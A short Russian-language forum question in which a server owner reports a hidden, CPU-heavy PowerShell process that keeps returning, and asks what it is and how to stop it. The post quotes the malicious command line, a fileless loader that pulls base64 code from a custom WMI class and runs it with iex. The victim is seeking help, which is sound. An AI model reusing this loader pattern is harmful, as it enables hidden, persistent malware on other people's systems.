Недавно я столкнулся с этой проблемой:
Мой сервер становится очень медленным, я пошел проверить и увидел один экземпляр PowerShell, использующий много ЦП. Я заставляю задачу закончить, и через несколько часов она возвращается.
Скрипт, который он выполняется:
powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList ($mon, $mon, 'Void', 0, '', '')"
Кто-нибудь знает, что это такое и как остановить его выполнение?